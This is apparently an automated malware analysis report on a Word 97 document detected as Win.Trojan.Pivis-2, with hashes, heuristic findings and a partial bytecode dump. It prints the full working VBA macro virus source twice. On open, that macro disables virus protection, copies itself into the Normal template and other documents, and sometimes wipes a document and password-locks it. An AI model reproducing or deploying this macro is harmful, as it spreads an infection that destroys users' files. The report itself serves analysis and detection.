Win.Trojan.Pivis-2 Office (OLE) malware analysis — malicious · d69452451573eab5

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-08-14 09:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: bafff52d89de041f678943224c14f642 SHA-1: 36b002bed06fb85aea3def56ac2ed66b204fe9bc SHA-256: d69452451573eab5fff8673720ec8b45ad4ef66bbc9a747cd3e87d1793f5cd31

120 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection name 'Win.Trojan.Pivis-2' strongly suggests a trojan payload. The macro code attempts to copy itself to other documents, indicating a self-propagation or infection mechanism.

Heuristics 3

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5954 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5954 bytes
SHA-256: `a7028948b9b6a5771b009881166a8a0cad8cb66f2810434d2b190a1677f40260`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Randomize Timer Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap viruscode = Activecl.lines(1, Activecl.countoflines) Normalcl.insertlines 1, viruscode InfecteerDeHap: If Activecl.countoflines > 0 Then GoTo Doeii viruscode = Normalcl.lines(1, Normalcl.countoflines) Activecl.insertlines 1, viruscode ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument Doeii: x = Int(Rnd * 100) If x = 11 Then MsgBox "w97.LAM€ by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..." If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje" With ActiveDocument.VBProject.VBComponents.Item(1).codemodule .ReplaceLine 39, "Sub ToolsMacro()" .ReplaceLine 40, "'(c) LiFEwiRE 2000" .ReplaceLine 42, "Sub ViewVBCode()" .ReplaceLine 43, "'www.coderz.net - www.shadowvx.org" End With '(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r 't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r! End Sub Private Sub Document_new() Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule viruscode = Normalcl.lines(1, Normalcl.countoflines) Activecl.insertlines 1, viruscode ActiveDocument.Saved = True End Sub ' Processing file: /opt/analyzer/scan_staging/261bab45269a43358b58e88ab8ee3fdf.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3489 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Ld Timer ' ArgsCall Read 0x0001 ' Line #3: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #4: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #5: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #6: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd codemodule ' Set Normalcl ' Line #7: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd codemodule ' Set Activecl ' Line #8: ' Ld Normalcl ' MemLd countoflines ' LitDI2 0x0000 ' Gt ' If ' BoSImplicit ' GoTo InfecteerDeHap ' EndIf ' Line #9: ' LitDI2 0x0001 ' Ld Activecl ' MemLd countoflines ' Ld Activecl ' ArgsMemLd lines 0x0002 ' St viruscode ' Line #10: ' LitDI2 0x0001 ' Ld viruscode ' Ld Normalcl ' ArgsMemCall insertlines 0x0002 ' Line #11: ' Label InfecteerDeHap ' Line #12: ' Ld Activecl ' MemLd countoflines ' LitDI2 0x0000 ' Gt ' If ' BoSImplicit ' GoTo Doeii ' EndIf ' Line #13: ' LitDI2 0x0001 ' Ld Normalcl ' MemLd countoflines ' Ld Normalcl ' ArgsMemLd lines 0x0002 ' St viruscode ' Line #14: ' LitDI2 0x0001 ' Ld viruscode ' Ld Activecl ' ArgsMemCall insertlines 0x0002 ' Line #15: ' Ld ActiveDocument ' MemLd FullName ' ParamNamed FileName ' Ld wdDocument ' ParamNamed Fileformat ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0002 ' Line #16: ' Label Doeii ' Line #17: ' Ld Rnd ' LitDI2 0x0064 ' Mul ' FnInt ' St x ' Line #18: ' Ld x ' LitDI2 0x000B ' Eq ' If ' BoSImplicit ' LitStr 0x0027 "w97.LAM€ by LiFEwiRE [www.shadowvx.org]" ' ParamOmitted ' LitStr 0x0012 "...::LiFEwiRE::..." ' ArgsCall MsgBox 0x0003 ' EndIf ' Line #19: ' Ld x ' LitDI2 0x0019 ' ... (truncated)

SHA-256: a7028948b9b6a5771b009881166a8a0cad8cb66f2810434d2b190a1677f40260

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Randomize Timer
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
viruscode = Activecl.lines(1, Activecl.countoflines)
Normalcl.insertlines 1, viruscode
InfecteerDeHap:
If Activecl.countoflines > 0 Then GoTo Doeii
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
x = Int(Rnd * 100)
If x = 11 Then MsgBox "w97.LAM€ by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
.ReplaceLine 39, "Sub ToolsMacro()"
.ReplaceLine 40, "'(c) LiFEwiRE 2000"
.ReplaceLine 42, "Sub ViewVBCode()"
.ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
End With
'(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r
't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

Private Sub Document_new()
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.Saved = True
End Sub

' Processing file: /opt/analyzer/scan_staging/261bab45269a43358b58e88ab8ee3fdf.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3489 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld Timer 
' 	ArgsCall Read 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Normalcl 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Activecl 
' Line #8:
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo InfecteerDeHap 
' 	EndIf 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld Activecl 
' 	MemLd countoflines 
' 	Ld Activecl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Normalcl 
' 	ArgsMemCall insertlines 0x0002 
' Line #11:
' 	Label InfecteerDeHap 
' Line #12:
' 	Ld Activecl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo Doeii 
' 	EndIf 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	Ld Normalcl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Activecl 
' 	ArgsMemCall insertlines 0x0002 
' Line #15:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdDocument 
' 	ParamNamed Fileformat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #16:
' 	Label Doeii 
' Line #17:
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	St x 
' Line #18:
' 	Ld x 
' 	LitDI2 0x000B 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0027 "w97.LAM€ by LiFEwiRE [www.shadowvx.org]"
' 	ParamOmitted 
' 	LitStr 0x0012 "...::LiFEwiRE::..."
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #19:
' 	Ld x 
' 	LitDI2 0x0019 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.